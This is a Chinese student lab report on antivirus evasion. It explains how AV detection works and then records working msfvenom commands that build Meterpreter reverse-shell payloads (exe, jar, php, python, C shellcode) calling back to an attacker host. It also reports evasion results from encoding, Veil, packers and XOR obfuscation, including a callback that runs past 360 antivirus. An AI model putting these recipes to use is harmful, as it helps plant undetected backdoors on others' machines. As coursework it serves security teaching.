2018-2019-2 《網絡對抗技術》Exp3 免殺原理與實踐 20165211

時間 2019-11-07

標籤網絡對抗技術 exp3 exp 原理實踐欄目系統網絡简体版

原文原文鏈接

目錄php

2018-2019-2 《網絡對抗技術》Exp3 免殺原理與實踐 20165211

2018-2019-2 《網絡對抗技術》Exp3 免殺原理與實踐 20165211

1. 基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

基於特徵碼檢測java

簡單來講一段特徵碼就是一段或多段數據。若是一個可執行文件（或其餘運行的庫、腳本等）包含這樣的數據則被認爲是惡意代碼。python

重要的就是，惡意軟件的檢測，並非比對整個文件，而只能只其中一個或幾個片段做爲識別依據。git
啓發式惡意軟件檢測github

簡單來講，就是根據些片面特徵去推斷。一般是由於缺少精確斷定依據。shell

優勢：數據庫
- 能夠檢測0-day惡意軟件
- 具備必定通用性
缺點：編程
- 實時監控系統行爲，開銷稍多
- 沒有基於特徵碼的精確度高
基於行爲的惡意軟件檢測windows

最開始提出啓發式時，通常也是針對特徵掃描的而言的，指通用的、多特徵的、非精確的掃描，因此後來又提出了基於行爲的。從理論上講，基於行爲的檢測至關因而啓發式的一種，或者是加入了行爲監控的啓發式。安全

（2）免殺是作什麼？

免殺就是讓安插的後門不被AV軟件發現。

（3）免殺的基本方法有哪些？

改變特徵碼
- 只有EXE
  - 加殼：壓縮殼加密殼
- 有shellcode
  - 用encode進行編碼
  - 基於payload從新編譯生成可執行文件
- 有源代碼
  - 用其餘語言進行重寫再編譯（veil-evasion）
改變行爲
- 通信方式
  - 儘可能使用反彈式鏈接
  - 使用隧道技術
  - 加密通信數據
- 操做模式
  - 基於內存操做
  - 減小對系統的修改
  - 加入混淆做用的正常功能代碼
很是規方法
- 使用一個有漏洞的應用當成後門，編寫攻擊代碼集成到如MSF中。
- 使用社工類攻擊，誘騙目標關閉AV軟件。
- 純手工打造一個惡意軟件

2. 實踐過程記錄

本次實驗主要使用的檢測工具

Virscan

VirusTotal

1.正確使用msf編碼器

kali的ip地址：192.168.78.128

使用命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.78.128 LPORT=5211 -f exe > akashi1.exe

生成最基本的可執行文件

將文件上傳至Virscan：結果爲29/49

上傳至VirusTotal ：結果爲51/71

使用命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=xxx LPORT=xxx -f exe > met-encoded10.exe

進行屢次編碼，並檢驗結果，以下

將文件上傳至Virscan：結果爲27/49

上傳至VirusTotal ：結果爲50/70

由上可見，進行屢次編碼的方式並不能達到免殺的目的。

2. msfvenom生成如jar之類的其餘文件

(1) 生成jar文件

使用命令

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.78.129 lport=5211 x> akashi_jar.jar

將文件上傳至Virscan：結果爲6/49

上傳至VirusTotal ：結果爲34/60

將此文件放到主機（win10+Windows Defender+電腦管家）無報毒。

(2)生成php文件

使用命令

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.78.129 lport=5211 x> akashi_php.php

將文件上傳至Virscan：結果爲1/49

上傳至VirusTotal ：結果爲3/58

將此文件放到主機（win10+Windows Defender+電腦管家）無報毒。

(3)生成Python文件

使用命令

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=5211 -f raw > akashi_python.py

將文件上傳至Virscan：結果爲5/49

上傳至VirusTotal ：結果爲14/55

3. veil-evasion

使用veil生成木馬程序

期間須要選擇Payload Module，並設置LHOST和LPORT

將文件上傳至Virscan：結果爲14/49

上傳至VirusTotal ：結果爲37/68

放到電腦中，被電腦管家查殺……

4. 加殼工具

對咱們剛剛生成的軟件進行加殼處理吧

壓縮殼UPX

對剛剛的Akashi_Veil.exe用UPX加殼，生成Akashi_Veil_UPX.exe

將文件上傳至Virscan：結果爲17/49

上傳至VirusTotal ：結果爲37/70

加密殼Hyperion

將文件上傳至Virscan：結果爲21/49

上傳至VirusTotal ：結果爲44/68

總的來講，使用加殼軟件，彷佛並不能獲得很好地免殺效果。這些加殼軟件中包含的特徵信息，有時候反而會增長殺毒軟件識別的可能性。

5. 使用shellcode編程

使用命令

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.78.129 LPORT=5211 -f c

生成一個shellcode。

建立文件Akashi_Shellcode.c，將第一步獲得的shellcode編入其中

我所看的資料要求使用i686-w64-mingw32-g++ Akashi_Shellcode.c -o Akashi_Shellcode.exe編譯，可生成可執行文件。命令也可執行，可是在嘗試回連時一直顯示失敗？？？？（使人頭禿了………………要一個回連不了的文件有何用啊？？？

嘗試將文件放在主機環境中編譯，用CB編譯後運行……查看結果，OK~能夠！

將文件上傳至Virscan：結果爲9/49

將文件上傳至VirusTotal ：結果爲23/68

卻發現，個人電腦管家對他毫無反應，彷佛已經實現了騰訊電腦管家的免殺？？是電腦管家太廢了吧……

看了一下VirusTotal 的結果，果真……Tencent顯示clean……認真考慮要不要換一個殺毒軟件……

6. 經過組合應用各類技術實現惡意代碼免殺

第五步莫名其妙實現了本身電腦的免殺……嘗試一降低低Virscan和VirusTotal掃描出來的數量吧

1. 嘗試加殼

將文件上傳至Virscan：結果爲13/49

將文件上傳至VirusTotal ：結果爲26/68

主機電腦管家未查殺

就結果而言，反而是增長了，大概是加了殼以後，反而給了更多的特徵吧，讓殺軟更容易檢測出來。

2. 嘗試對shellcode進行簡單處理

這裏想到的方法，有對Shellcode進行異或處理，或是對其進行加密後解密
主要嘗試異或處理，將Shellcode與一固定字符串進行異或後存儲，在程序中在進行一次異或，便可還原。
查看結果，將文件上傳至Virscan：結果爲6/49

將文件上傳至VirusTotal ：結果爲20/70

能夠看到這樣的效果的確是有所改善的啦，回連也是成功的！

按這個思路，再對文件進行一些操做，應該是能夠獲得更好的結果的。

7. 用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

Kali使用橋接模式，並在使用前測試與目標主機可否ping通。

如下是回連成功的截圖。

電腦版本爲 win7+360殺毒軟件

3. 實踐總結與體會

在本次實驗中，主要探索了免殺的實現。

實驗的主要曲折，應該就是安裝Veil了，中途經歷了各類問題，大概是以前安裝kali的過程過於順利，感受這一次把全部可能的棘手問題都碰到了。虛擬機網絡鏈接有問題，虛擬網絡適配器被刪除，kali源鏈接不上，找不到命令。先後倒騰，甚至差點要從新安裝一遍VMware。

在進行實驗的時候，居然發如今實驗未完成的狀況下，居然已經完成了免殺。鄭重的考慮換一個殺毒軟件。

發現實現一個免殺的惡意代碼，並無想象中那麼難，在網絡安全方面仍是有不少須要注意的地方啊。

4. 開啓殺軟能絕對防止電腦中惡意代碼嗎？

並不能，在本次實驗中，咱們主要要實現的就是在殺軟開啓的狀況下，實現惡意代碼，掌握主機的控制權。在本次試驗中，僅僅靠shellcode半手工居然就能夠實現騰訊的免殺，更不用提更多進過黑客們精心構造的惡意代碼。目前殺軟的主要檢測方式，主要仍是基於特徵碼，依賴於他們的數據庫源，面對一些新的惡意代碼，防禦的能力仍是不好的。

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。